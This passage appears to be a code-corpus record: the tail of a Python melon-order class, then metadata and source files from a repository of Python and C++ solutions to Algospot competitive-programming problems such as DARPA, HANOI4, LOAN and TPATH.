\"domestic\"\n tax = 0.08\n\n \n\nclass InternationalMelonOrder(AbstractMelonOrder):\n \"\"\"An international (non-US) melon order.\"\"\"\n\n order_type = \"international\"\n tax = 0.17\n\n def __init__(self, species, qty, country_code):\n super().__init__(species, qty)\n self.country_code = country_code\n \n\n def get_country_code(self):\n \"\"\"Return the country code.\"\"\"\n\n return self.country_code\n\n def get_total(self):\n total = super().get_total()\n if self.qty < 10:\n total += 3\n \n return total\n\n\nclass GovernmentMelonOrder(AbstractMelonOrder):\n \"\"\"A government melon order that must pass security inspection.\"\"\"\n\n order_type = 'government'\n passed_inspection = False\n tax = 0\n\n def mark_inspection(self, passed):\n\n self.passed_inspection = passed\n\n\nclass TooManyMelonsError(ValueError):\n \"\"\"Raises error if order is for more than 100 melons.\"\"\"" } ]
1
free-lunch/algospot-solving
https://github.com/free-lunch/algospot-solving
ed9af366f6383ebc2715aec44c496fd4765446f0
156cdc1cbb3607552904a55bba1771c9fb0f6ec9
32c99d9077bf5b553baa50554d41f5cf22441e0d
refs/heads/master
2020-12-11T09:05:11.182329
2016-08-30T09:12:10
2016-08-30T09:12:10
59,334,190
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.4279015362262726, "alphanum_fraction": 0.4560375213623047, "avg_line_length": 20.325000762939453, "blob_id": "97d15f2a07052c79b91c160f62a7f9f4e61b6dad", "content_id": "c5cf716ab4ecc65e8851d883e664b5eb7f923125", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 853, "license_type": "no_license", "max_line_length": 52, "num_lines": 40, "path": "/DARPA/DARPA.py", "repo_name": "free-lunch/algospot-solving", "src_encoding": "UTF-8", "text": "import sys\n\ndiffs = None\nN, M = None, None\n\ndef decision(minimum):\n cosum = 0\n cnt = 0\n for i in xrange(M-1):\n cosum += diffs[i]\n if cosum >= minimum:\n cosum = 0\n cnt += 1\n if cnt == N-1:\n return True\n return False\n\ndef solve():\n lo = 0.0\n hi = 240.0\n mid = (lo+hi)/2\n while hi-lo > 0.009:\n if decision(mid):\n lo = mid\n else:\n hi = mid\n mid = (lo+hi)/2\n\n return mid\n\n\nif __name__ == \"__main__\":\n rl = lambda : sys.stdin.readline()\n for _ in xrange(int(rl())):\n N, M = map(int, rl().split())\n locations = map(float, rl().split())\n diffs = [-1]*(M-1)\n for i in xrange(len(locations)-1):\n diffs[i] = locations[i+1] - locations[i]\n print \"{:.2f}\".format(round(solve(), 2))\n" }, { "alpha_fraction": 0.4065384566783905, "alphanum_fraction": 0.42923077940940857, "avg_line_length": 23.29906463623047, "blob_id": "a7707bf51b74d114ee0cbae9cc1cd1c46c74d384", "content_id": "39ea978fd5afb824be74e70e5a463e5dd7039b8c", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2600, "license_type": "no_license", "max_line_length": 72, "num_lines": 107, "path": "/HANOI4/HANOI4_Bit.py", "repo_name": "free-lunch/algospot-solving", "src_encoding": "UTF-8", "text": "import sys\nimport collections\n\ndef get(state, index):\n return (state >> (index * 2)) & 3\n\ndef set(state, index, value):\n return (state & ~(3<< (index * 2))) | (value << (index * 2))\n\ndef inc(n):\n if n > 0 :\n return n + 1\n elif n < 0:\n return n - 1\n else:\n return 0\n\ndef set_list(state, index_list, value):\n ret = state\n for i in index_list:\n ret = set(ret, i, value)\n return ret\n\nd = dict()\ndef precalc(disk_num):\n print 'hello'\n end = 0\n for i in xrange(1,disk_num+1):\n end = set(end, i, 3)\n\n d[end] = 0\n\n q = collections.deque()\n q.append(end)\n\n while q :\n parent = q.popleft()\n top = [-1,-1,-1,-1]\n for n in xrange(disk_num+1,0,-1):\n top[get(parent, n)] = n\n\n for i in xrange(4):\n if top[i] != -1:\n for j in xrange(4):\n if i != j and (top[j] == -1 or top[j] > top[i]):\n child = set(parent, top[i], j)\n if not child in d:\n d[child] = d[parent] + 1\n q.append(child)\n\n\ndef solve(disk_num, state):\n end = 0\n for i in xrange(1,disk_num+1):\n end = set(end, i, 3)\n\n if end == state:\n return 0\n\n c = dict()\n\n c[end] = -1\n c[state] = 1\n\n q = collections.deque()\n q.append(state)\n q.append(end)\n\n while q :\n parent = q.popleft()\n top = [-1,-1,-1,-1]\n for n in xrange(disk_num+1,0,-1):\n top[get(parent, n)] = n\n\n for i in xrange(4):\n if top[i] != -1:\n for j in xrange(4):\n if i != j and (top[j] == -1 or top[j] > top[i]):\n child = set(parent, top[i], j)\n if not child in c:\n c[child] = inc(c[parent])\n q.append(child)\n else:\n if c[child] * c[parent] < 0:\n return abs(c[child]) + abs(c[parent]) -1\n return -1\n\n\n\nif __name__ == \"__main__\":\n rl = lambda : sys.stdin.readline().rstrip('\\n')\n for _ in xrange(int(rl())):\n disk_num = int(rl())\n state = 0\n for i in xrange(4):\n state = set_list(state, 
map(int, rl().split()[1:]), i)\n print solve(disk_num, state)\n\n # For random test\n # import random\n # n = 10\n #\n # for _ in xrange(2):\n # state = 0\n # for i in xrange(1,n+1):\n # state = set(state,i,random.randrange(0,4))\n # print solve(n, state)\n" }, { "alpha_fraction": 0.5714285969734192, "alphanum_fraction": 0.5864661931991577, "avg_line_length": 21.16666603088379, "blob_id": "4e13163c1337678a400943f9d86184a6839bb2ef", "content_id": "5a7fff2ecff27ecf0645f8e35720f632186d8795", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 133, "license_type": "no_license", "max_line_length": 54, "num_lines": 6, "path": "/HELLOWORLD/HELLOWORLD.py", "repo_name": "free-lunch/algospot-solving", "src_encoding": "UTF-8", "text": "import sys\n\nrl = lambda : sys.stdin.readline().rstrip(' \\t\\r\\n\\0')\n\nfor _ in xrange(int(rl())):\n print \"Hello, {0}!\".format(rl())\n" }, { "alpha_fraction": 0.37823835015296936, "alphanum_fraction": 0.462435245513916, "avg_line_length": 24.733333587646484, "blob_id": "7363527387cafb3c8970d890478eabdbe57ed06e", "content_id": "a74ae788ba0353df1477f97e480983ef1fe7b6e1", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 772, "license_type": "no_license", "max_line_length": 58, "num_lines": 30, "path": "/LOAN/LOAN.py", "repo_name": "free-lunch/algospot-solving", "src_encoding": "UTF-8", "text": "import sys\n\ndef pay_all_debt(N, M, P, month_pay):\n for i in xrange(M):\n # print N, 1+1.0*P/100\n N *= (1+1.0*P/12/100)\n N -= month_pay\n if N <= 0:\n break\n return N<=0\n\ndef solve(N, M, P):\n lo, hi = 0.0, 10.0**8\n while hi -lo > 10**-8:\n mid = (lo+hi)/2\n if pay_all_debt(N,M,P, mid):\n hi = mid\n else:\n lo = mid\n\n return mid\n\nif __name__ == \"__main__\":\n # print \"{:0.10f}\".format(solve(20000000, 12, 6.8))\n # print pay_all_debt(20000000, 12, 6.8, 2343750.0)\n rl = lambda : sys.stdin.readline().rstrip(' \\t\\r\\n\\0')\n for i in xrange(int(rl())):\n N, M, P = rl().split()\n N, M, P = float(N), int(M), float(P)\n print \"{:0.10f}\".format(solve(N, M, P))\n" }, { "alpha_fraction": 0.2742980420589447, "alphanum_fraction": 0.31317493319511414, "avg_line_length": 26.235294342041016, "blob_id": "520346ca2544e1ad2472843b1bbb729c20e7de11", "content_id": "9a3c2fe17b126d45cb57587d3a6c798677363452", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 463, "license_type": "no_license", "max_line_length": 75, "num_lines": 17, "path": "/URI/URI.py", "repo_name": "free-lunch/algospot-solving", "src_encoding": "UTF-8", "text": "import sys\n\nd = {'%24':'$','%25':'%','%20':' ','%21':'!','%28':'(','%29':')','%2a':'*'}\nif __name__ == \"__main__\":\n rl = lambda : sys.stdin.readline().rstrip(' \\t\\r\\n\\0')\n for _ in xrange(int(rl())):\n uri = rl()\n ret = \"\"\n i = 0\n while i < len(uri):\n if uri[i] == \"%\":\n ret += d[uri[i:i+3]]\n i += 3\n else:\n ret += uri[i]\n i += 1\n print ret\n" }, { "alpha_fraction": 0.4265129566192627, "alphanum_fraction": 0.4495677351951599, "avg_line_length": 23.785715103149414, "blob_id": "bb86541cd9c5fc7f7644252d3e6f78770d1fd7f2", "content_id": "e099da5620af99a72c60bb95db11babcc44d6eaf", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 347, "license_type": "no_license", "max_line_length": 50, "num_lines": 14, "path": "/ANAGRAM/ANAGRAM.py", "repo_name": "free-lunch/algospot-solving", "src_encoding": "UTF-8", "text": 
"import sys\n\nif __name__ == \"__main__\":\n rl = lambda : sys.stdin.readline()\n for _ in xrange(int(rl())):\n str1, str2 = rl().split()\n if str1 == str2 or len(str1) != len(str2):\n print(\"No.\")\n continue\n\n if sorted(str1) == sorted(str2):\n print(\"Yes\")\n else:\n print(\"No.\")\n" }, { "alpha_fraction": 0.5625, "alphanum_fraction": 0.5659722089767456, "avg_line_length": 16, "blob_id": "c7e9a1025294ad140d4960f80383bc2a2f6288fc", "content_id": "ab31b5e8183ddd5787ebafc46ef3e1d21bfcfb7f", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 288, "license_type": "no_license", "max_line_length": 53, "num_lines": 17, "path": "/WILDCARD/WILDCARD.py", "repo_name": "free-lunch/algospot-solving", "src_encoding": "UTF-8", "text": "import sys\nimport fnmatch\n\n\nif __name__ == \"__main__\":\n\trl = lambda: sys.stdin.readline().rstrip('\\t\\r\\n\\0')\n\tfor _ in xrange(int(rl())):\n\t\tw = rl()\n\t\tnames = []\n\t\tfor _ in xrange(int(rl())):\n\t\t\tnames.append(rl())\n\n\t\tret = fnmatch.filter(names, w)\n\t\tret.sort()\n\n\t\tfor i in ret:\n\t\t\tprint i" }, { "alpha_fraction": 0.5248227119445801, "alphanum_fraction": 0.5531914830207825, "avg_line_length": 22.5, "blob_id": "6e50bf5399285a909d061a8e5db0afe95a9a8b8a", "content_id": "567e90c4caecd03a1827ea5cfbff42047a44b2de", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 141, "license_type": "no_license", "max_line_length": 61, "num_lines": 6, "path": "/ENCRYPT/ENCRYPT.py", "repo_name": "free-lunch/algospot-solving", "src_encoding": "UTF-8", "text": "import sys\n\nrl = lambda:sys.stdin.readline().rstrip().rstrip(' \\t\\r\\n\\0')\nfor _ in xrange(int(rl())):\n s = rl()\n print(s[::2]+s[1::2])\n" }, { "alpha_fraction": 0.6705882549285889, "alphanum_fraction": 0.6705882549285889, "avg_line_length": 20.25, "blob_id": "9c8156147857ac9c99fb3a495cc2d83b198c4ede", "content_id": "add399d0d0537a0453b5fadb36788587afb15484", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 85, "license_type": "no_license", "max_line_length": 43, "num_lines": 4, "path": "/MERCY/MERCY.py", "repo_name": "free-lunch/algospot-solving", "src_encoding": "UTF-8", "text": "import sys\n\nfor _ in xrange(int(sys.stdin.readline())):\n print('Hello Algospot!')\n" }, { "alpha_fraction": 0.5126582384109497, "alphanum_fraction": 0.5379746556282043, "avg_line_length": 23.947368621826172, "blob_id": "bf63bf09e7138857e866b18156688e7bdb5c01f6", "content_id": "3d4547d23451ea54ffd780a9ddd266a86d91fb26", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 474, "license_type": "no_license", "max_line_length": 75, "num_lines": 19, "path": "/STARCRAFT/STARCRAFT.py", "repo_name": "free-lunch/algospot-solving", "src_encoding": "UTF-8", "text": "import sys\nfrom math import factorial\n\ndef solve(p, k):\n combination = lambda n, k: factorial(n) / (factorial(n-k)*factorial(k))\n p = 1.0*p/100\n all_win = p**k\n\n ret = all_win\n for i in xrange(1,k):\n ret += combination(k+(i-1),i) * (1.0 - p)**i * all_win\n\n return ret\n\nif __name__ == \"__main__\":\n rl = lambda : sys.stdin.readline()\n for _ in xrange(int(rl())):\n p, k = map(int, rl().split())\n print(int(round(solve(p, k)*100)))\n" }, { "alpha_fraction": 0.46973365545272827, "alphanum_fraction": 0.47699758410453796, "avg_line_length": 17.772727966308594, "blob_id": "5b2663eb1329c163e89b0c747bac456ceb936032", "content_id": 
"c11cf09a1a40b50202792f1ef8457f0a71d3e5b0", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 413, "license_type": "no_license", "max_line_length": 58, "num_lines": 22, "path": "/STRJOIN/STRJOIN.py", "repo_name": "free-lunch/algospot-solving", "src_encoding": "UTF-8", "text": "import sys\nfrom heapq import *\n\ndef solve(l):\n ret = 0\n q = sorted(l)\n \n while len(q) > 1:\n a = heappop(q)\n b = heappop(q)\n ret += a+b\n heappush(q,a+b)\n\n return ret\n\n\nif __name__ == \"__main__\":\n rl = lambda : sys.stdin.readline().rstrip(' \\t\\r\\n\\0')\n for _ in xrange(int(rl())):\n rl()\n str_list = map(int, rl().split())\n print solve(str_list)\n" }, { "alpha_fraction": 0.5752032399177551, "alphanum_fraction": 0.5975610017776489, "avg_line_length": 21.409090042114258, "blob_id": "d981ab211d1d96278f7e136544b4c3bf2013189d", "content_id": "c08f549fb74786098e63412a0eee4b95526f6a90", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 492, "license_type": "no_license", "max_line_length": 62, "num_lines": 22, "path": "/TRIANGLEPATH/TRIANGLEPATH.py", "repo_name": "free-lunch/algospot-solving", "src_encoding": "UTF-8", "text": "import sys\n\nclass TrianglePath():\n\t@staticmethod\n\tdef solve(triangle):\n\t\tn = len(triangle)\n\t\tfor i in xrange(n-1,-1,-1):\n\t\t\tfor j in xrange(n-1,-1,-1):\n\t\t\t\tif i < j:\n\t\t\t\t\ttriangle[j-1][i] += max(triangle[j][i], triangle[j][i+1])\n\n\t\treturn triangle[0][0]\n\nif __name__ == \"__main__\":\n\trl = lambda: sys.stdin.readline().rstrip('\\t\\r\\n\\0')\n\n\tfor _ in xrange(int(rl())):\n\t\ttriangle = []\n\t\tfor _ in xrange(int(rl())):\n\t\t\ttriangle.append(map(int, rl().split()))\n\n\t\tprint TrianglePath.solve(triangle)" }, { "alpha_fraction": 0.4559228718280792, "alphanum_fraction": 0.47566574811935425, "avg_line_length": 25.240962982177734, "blob_id": "fd20d7bdc67c1b6c1a438a438ddba40d72db684c", "content_id": "e4bc998a2701c02d564f88c53cd318c7dd6f0c88", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2178, "license_type": "no_license", "max_line_length": 79, "num_lines": 83, "path": "/TPATH/TPATH_dict.py", "repo_name": "free-lunch/algospot-solving", "src_encoding": "UTF-8", "text": "import sys\nfrom collections import defaultdict\n# import gc\ngraph = defaultdict(list)\n\ndef dfs1(n, start, min_v, max_v):\n if start == n-1:\n graph[start][start] = min(graph[start][start], max_v-min_v)\n return\n\n graph[start][start] = 1\n for i in xrange(n):\n if start == i:\n continue\n # Visited Node\n if n-1 != i and graph[i][i] != -1:\n continue\n\n if graph[start][i] >= 0:\n if min_v == -1:\n dfs(n, i, graph[start][i], graph[start][i])\n else:\n dfs(n,i,min(min_v,graph[start][i]), max(max_v,graph[start][i]))\n\n graph[start][start] = -1\n\ndef solve1(n, m):\n dfs(n, 0, -1, -1)\n return graph[n-1][n-1]\n\ndef dfs2(n, start, min_v, max_v, visited):\n if start == n-1:\n return True\n\n # Check visited\n visited[start] = True\n\n for v2, cost in graph[start]:\n # Visit not visted adjacent node\n if not visited[v2] and min_v <= cost <= max_v:\n if dfs2(n, v2, min_v, max_v, visited):\n visited[start] = False\n return True\n visited[start] = False\n return False\n\ndef solve2(n, m, orders):\n lo, hi, ret = 0, 0, sys.maxint\n while True:\n visited = [False]*n\n if dfs2(n, 0, orders[lo], orders[hi], visited):\n ret = min(ret, orders[hi]-orders[lo])\n lo += 1\n else:\n if hi == len(orders)-1:\n break\n hi += 
1\n return ret\n\nif __name__ == \"__main__\":\n rl = lambda : sys.stdin.readline().rstrip(' \\t\\r\\n\\0')\n for _ in xrange(int(rl())):\n # gc.collect()\n n, m = map(int, rl().split())\n if m == 1:\n rl()\n print 0\n continue\n\n # for i in xrange(n):\n # for j in xrange(n):\n # graph[i][j] = -1\n\n orders = set()\n for i in xrange(m):\n v1, v2, cost = map(int, rl().split())\n graph[v1].append((v2,cost))\n graph[v2].append((v1,cost))\n # graph[v1][v2] = cost\n # graph[v2][v1] = cost\n orders.add(cost)\n\n print solve2(n, m, sorted(list(orders)))\n" }, { "alpha_fraction": 0.4326923191547394, "alphanum_fraction": 0.49038460850715637, "avg_line_length": 23, "blob_id": "6b8239201550c736915a56698b66361d4c3b7a2b", "content_id": "9fa032b1d3bb5d7bd5acc55696181d8c5ca3b756", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 624, "license_type": "no_license", "max_line_length": 47, "num_lines": 26, "path": "/SNAIL/SNAIL.py", "repo_name": "free-lunch/algospot-solving", "src_encoding": "UTF-8", "text": "import sys\n\ncache = None\ndef precalc():\n global cache\n cache = [[0]*i for i in xrange(1,1002)]\n cache[1][0] = 0.75\n cache[1][1] = 0.25\n for i in xrange(1000):\n for j in xrange(i+1):\n cache[i+1][j] += cache[i][j]*0.75\n for j in xrange(i+1):\n cache[i+1][j+1] += cache[i][j]*0.25\n\ndef solve(n, m):\n ret = 0\n for i in xrange(2*m-n+1):\n ret += cache[m][i]\n return ret\n\nif __name__ == \"__main__\":\n precalc()\n rl = lambda: sys.stdin.readline()\n for _ in xrange(int(rl())):\n n, m = map(int, rl().split())\n print \"{:.10f}\".format(solve(n, m))\n" }, { "alpha_fraction": 0.41016462445259094, "alphanum_fraction": 0.42591267824172974, "avg_line_length": 23.508771896362305, "blob_id": "09b86ded84902d7c0c804fa9c545e7fc8a46de40", "content_id": "87059bf8267f67e266a66a45a764c2dc9f639075", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1397, "license_type": "no_license", "max_line_length": 83, "num_lines": 57, "path": "/HANOI4/HANOI4.py", "repo_name": "free-lunch/algospot-solving", "src_encoding": "UTF-8", "text": "import sys\nimport collections\n\n# Move i -> j\n\ndef move2tuple(tup, i, j):\n l = list(tup)\n l[j] = tup[j] + (tup[i][-1],)\n l[i] = tup[i][:len(tup[i])-1]\n return tuple(l)\n\ndef inc(n):\n if n > 0 :\n return n + 1\n elif n < 0:\n return n - 1\n else:\n return 0\n\ndef solve(disk_num, state):\n end = (),(),(),tuple([i for i in xrange(disk_num,0,-1 )])\n if end == state:\n return 0\n\n c = dict()\n c[end] = -1\n c[state] = 1\n\n q = collections.deque()\n q.append(state)\n\n while q :\n parent = q.popleft()\n for i in xrange(4):\n if parent[i]:\n for j in xrange(4):\n if i != j and (not parent[j] or parent[j][-1] > parent[i][-1]):\n child = move2tuple(parent, i, j)\n if not child in c:\n c[child] = inc(c[parent])\n q.append(child)\n else:\n if c[child] * c[parent] < 0:\n return abs(c[child]) + abs(c[parent]) -1\n\n return c[end]\n\n\nif __name__ == \"__main__\":\n rl = lambda : sys.stdin.readline().rstrip('\\n')\n for _ in xrange(int(rl())):\n disk_num = int(rl())\n state = ()\n for i in xrange(4):\n state += tuple(map(int, rl().split())[1:]),\n\n print solve(disk_num, state)\n" }, { "alpha_fraction": 0.41853034496307373, "alphanum_fraction": 0.43130990862846375, "avg_line_length": 23.076923370361328, "blob_id": "f338c658650517545557ce7f91c32156cfba4f35", "content_id": "ce8cb768461c2968a7d3c6e005c0a296d247fe0f", "detected_licenses": [], "is_generated": false, "is_vendor": 
false, "language": "Python", "length_bytes": 313, "license_type": "no_license", "max_line_length": 58, "num_lines": 13, "path": "/FIX/FIX.py", "repo_name": "free-lunch/algospot-solving", "src_encoding": "UTF-8", "text": "import sys\n\nif __name__ == \"__main__\":\n rl = lambda : sys.stdin.readline().rstrip(' \\t\\r\\n\\0')\n for _ in xrange(int(rl())):\n rl()\n ret = 0\n input = map(int, rl().split())\n for i in xrange(len(input)):\n if (i+1) == input[i]:\n ret += 1\n\n print ret\n" }, { "alpha_fraction": 0.46335533261299133, "alphanum_fraction": 0.47690171003341675, "avg_line_length": 20.646615982055664, "blob_id": "365e190d3fcbac9d128c587772fa84bc1cd52ba5", "content_id": "90ecb7a85c540018c6e210f717fc36ce0548c97b", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 2879, "license_type": "no_license", "max_line_length": 74, "num_lines": 133, "path": "/TPATH/TPATH.cpp", "repo_name": "free-lunch/algospot-solving", "src_encoding": "UTF-8", "text": "#include <iostream>\n#include <vector>\n#include <limits>\n#include <algorithm>\n#include <sstream>\n#include <cstring>\n\nusing namespace std;\n\n#define MAX 987654321\nint V, E;\n\n\nbool dfs(int start, vector<vector<pair<int, int> > > adj, \\\n int lo, int hi, vector<bool> visited){\n\n if(start == V-1)\n return true;\n\n visited[start] = true;\n for(int i = 0; i < adj[start].size(); i++){\n int v2 = adj[start][i].first;\n int cost = adj[start][i].second;\n if(!visited[v2] && lo <= cost && cost <= hi){\n if(dfs(v2, adj, lo, hi, visited)) {\n return true;\n }\n }\n }\n return false;\n}\n\nint solve(vector<vector<pair<int, int> > >adj, vector<int> order){\n int lo = 0;\n int hi = 0;\n int ret = MAX;\n\n while(true){\n vector<bool> visited(V, false);\n if(dfs(0, adj, order[lo], order[hi], visited)){\n ret = min(ret, order[hi]-order[lo]);\n lo++;\n }\n else{\n if(hi == order.size()-1){\n break;\n }\n hi++;\n }\n }\n return ret;\n}\n\n// Kruskal\nstruct DisjointSet {\n vector<int> parent, rank;\n\n DisjointSet(int n) : parent(n), rank(n, 1) {\n for(int i = 0; i < n; i++)\n parent[i] = i;\n }\n\n int find(int u) {\n if(u == parent[u])\n return u;\n return parent[u] = find(parent[u]);\n }\n\n void merge(int u, int v) {\n u = find(u); v = find(v);\n if(u == v)\n return;\n\n if(rank[u] > rank[v])\n swap(u, v);\n\n if(rank[u] == rank[v])\n rank[v]++;\n\n parent[u] = v;\n }\n};\n\n\nvector<pair<int, pair<int,int> > > order;\n\nint minUpperBound(int lo){\n DisjointSet sets(V);\n for(int i = 0; i < E; i++) {\n if(order[i].first < lo)\n continue;\n\n sets.merge(order[i].second.first, order[i].second.second);\n if(sets.find(0) == sets.find(V-1))\n return order[i].first;\n }\n\n return MAX;\n}\n\nint solve2(vector<vector<pair<int, int> > >adj) {\n int ret = MAX;\n for(int i = 0; i < E; i++){\n ret = min(ret, minUpperBound(order[i].first)-order[i].first);\n }\n return ret;\n}\n\nint main(){\n cin.sync_with_stdio(false);\n\n int T = 0;\n cin >> T;\n\n while(T--){\n cin >> V >> E;\n int v1,v2,cost;\n vector<vector<pair<int, int> > > adj(V);\n order.resize(E);\n for(int i= 0; i < E; i++){\n cin >> v1 >> v2 >> cost;\n adj[v1].push_back(make_pair(v2, cost));\n adj[v2].push_back(make_pair(v1, cost));\n // order.push_back(cost);\n order[i] = make_pair(cost, make_pair(v1, v2));\n }\n // order.erase( unique(order.begin(), order.end()), order.end() );\n sort(order.begin(), order.end());\n\n cout << solve2(adj) <<endl;\n }\n return 0;\n}\n" }, { "alpha_fraction": 0.4161735773086548, "alphanum_fraction": 
0.4299802780151367, "avg_line_length": 28.823530197143555, "blob_id": "98aef1d8940a1a0961ca8cd8bc2982404f4593c7", "content_id": "c9454fcedbd79df9cefd99e7a236bd2b2a6ae591", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 507, "license_type": "no_license", "max_line_length": 50, "num_lines": 17, "path": "/MAXSUM/MAXSUM.py", "repo_name": "free-lunch/algospot-solving", "src_encoding": "UTF-8", "text": "import sys\n\nif __name__ == \"__main__\":\n rl = lambda : sys.stdin.readline()\n for _ in xrange(int(rl())):\n n = int(rl())\n array = map(int, rl().split())\n cu_sum, max_value = 0, 0\n for i in xrange(n):\n cu_sum += array[i]\n if cu_sum < 0 and array[i] > 0:\n cu_sum = array[i]\n elif cu_sum < 0 and array[i] < 0:\n cu_sum = 0\n else:\n max_value = max(max_value, cu_sum)\n print max_value\n" }, { "alpha_fraction": 0.5108107924461365, "alphanum_fraction": 0.5189189314842224, "avg_line_length": 22.870967864990234, "blob_id": "2f959e06508121748b794ca7f375b86ea55406f9", "content_id": "3e65b83f8ab5a86da6be6b075c88ae9ef319cd29", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 740, "license_type": "no_license", "max_line_length": 58, "num_lines": 31, "path": "/NECKLACE/NECKLACE.py", "repo_name": "free-lunch/algospot-solving", "src_encoding": "UTF-8", "text": "import sys\n\ndef determine(n, c, c_numbers, value):\n cu_sum = 0\n for i in xrange(c):\n cu_sum += min(c_numbers[i], value)\n if cu_sum >= value*n:\n return True\n else:\n return False\n\ndef solve(n, c, c_numbers):\n max_bound = sum(c_numbers)+1\n min_bound = 0\n\n while min_bound + 1 < max_bound:\n mid = (max_bound+min_bound)/2\n if determine(n, c, c_numbers, mid):\n min_bound = mid\n else:\n max_bound = mid\n\n return min_bound\n\n\nif __name__ == \"__main__\":\n rl = lambda : sys.stdin.readline().rstrip(' \\t\\r\\n\\0')\n for _ in xrange(int(rl())):\n n, c = map(int, rl().split())\n c_numbers = map(int, rl().split())\n print solve(n, c, c_numbers)\n" }, { "alpha_fraction": 0.49286314845085144, "alphanum_fraction": 0.512174665927887, "avg_line_length": 23.306121826171875, "blob_id": "a69e9b22a84e580a233bf403353fadeee2bdf66c", "content_id": "f183b6d376a1195b29bfd89bff096e65f71558cf", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1191, "license_type": "no_license", "max_line_length": 58, "num_lines": 49, "path": "/NUMBERGAME/NUMBERGAME.py", "repo_name": "free-lunch/algospot-solving", "src_encoding": "UTF-8", "text": "import sys\n\nboard = None\ncache = None\nn = 0\nMAX = 987654321\n\ndef dp(left, right):\n if not cache[left][right] is None:\n return cache[left][right]\n\n if left == right:\n cache[left][right] = board[left]\n return cache[left][right]\n elif (right - left) == 1:\n if board[left] > board[right]:\n diff = board[left] - board[right]\n else:\n diff = board[right] - board[left]\n\n cache[left][right] = diff\n return cache[left][right]\n else:\n # 4 cases\n ret = -MAX\n # Delete left 2\n ret = max(ret, -dp(left+2, right))\n # Delete right 2\n ret = max(ret, -dp(left, right-2))\n # Gain left 1\n ret = max(ret, board[left] - dp(left+1, right))\n # Gain right 1\n ret = max(ret, board[right] - dp(left, right-1))\n\n cache[left][right] = ret\n return cache[left][right]\n\n\n\ndef solve():\n return dp(0, n-1)\n\nif __name__ == \"__main__\":\n rl = lambda : sys.stdin.readline().rstrip(' \\t\\r\\n\\0')\n for _ in xrange(int(rl())):\n n = int(rl())\n cache = [[None]*n 
for _ in xrange(n)]\n board = map(int, rl().split())\n print solve()\n" }, { "alpha_fraction": 0.39347079396247864, "alphanum_fraction": 0.40549829602241516, "avg_line_length": 21.384614944458008, "blob_id": "c39fd7ddf63010bb7e867fd00bfbdd736de1fe68", "content_id": "6046d632ba8524df44c6903bd9f2ffb4e9fe60de", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 582, "license_type": "no_license", "max_line_length": 52, "num_lines": 26, "path": "/MATCHORDER/MATCHORDER.py", "repo_name": "free-lunch/algospot-solving", "src_encoding": "UTF-8", "text": "import sys\n\nif __name__ == \"__main__\":\n rl = lambda : sys.stdin.readline()\n\n for _ in xrange(int(rl())):\n rl()\n russia = map( int, rl().split())\n korea = map(int, rl().split())\n\n russia = sorted(russia,reverse=True)\n korea = sorted(korea,reverse=True)\n i, j, win = 0, 0, 0\n\n while True:\n if i == len(russia) or j == len(korea):\n break\n\n if russia[i] <= korea[j]:\n i+=1\n j+=1\n win += 1\n else:\n i+=1\n\n print win\n" }, { "alpha_fraction": 0.4920969307422638, "alphanum_fraction": 0.5100105404853821, "avg_line_length": 26.114286422729492, "blob_id": "f0f6cb5e3f8d55a0fa2aa0200e7d126b4a2ee27a", "content_id": "33e839b33dbdd9bde46b5a782d2885ee6c5e96a3", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 949, "license_type": "no_license", "max_line_length": 73, "num_lines": 35, "path": "/PICNIC/PICNIC.py", "repo_name": "free-lunch/algospot-solving", "src_encoding": "UTF-8", "text": "import sys\n\n\ngraph = None\ndef count_couples(n, visited):\n # Visit all friends\n if visited == (1<<n)-1:\n return 1\n\n ret = 0\n start = -1\n # Select next seed\n for i in xrange(n):\n if not (visited & (1<<i)):\n start = i\n break\n\n # Recursive call this function with couple(start, not visited friend)\n for i in xrange(start+1, n):\n if not (visited & (1<<i)):\n if graph[start][i]:\n ret += count_couples(n, visited+(1<<start)+(1<<i))\n\n return ret\n\nif __name__ == \"__main__\":\n rl = lambda : sys.stdin.readline().rstrip(' \\t\\r\\n\\0')\n for _ in xrange(int(rl())):\n n, m = map(int, rl().split())\n graph = [[False]*n for _ in xrange(n)]\n friends = map(int, rl().split())\n for i in xrange(0,m*2,2):\n graph[friends[i]][friends[i+1]] = True\n graph[friends[i+1]][friends[i]] = True\n print count_couples(n, 0)\n" }, { "alpha_fraction": 0.38771185278892517, "alphanum_fraction": 0.42266950011253357, "avg_line_length": 29.45161247253418, "blob_id": "ab3737fcb76b8029f61fc3dab1b195ca1206bf8c", "content_id": "6bab4ddc24f5c9d8806745728c32beaff490437e", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 944, "license_type": "no_license", "max_line_length": 61, "num_lines": 31, "path": "/WEEKLYCALENDAR/WEEKLYCALENDAR.py", "repo_name": "free-lunch/algospot-solving", "src_encoding": "UTF-8", "text": "import sys\n\nweek_day = ['Sunday', 'Monday', 'Tuesday', 'Wednesday',\\\n 'Thursday', 'Friday', 'Saturday']\nnumber_day = 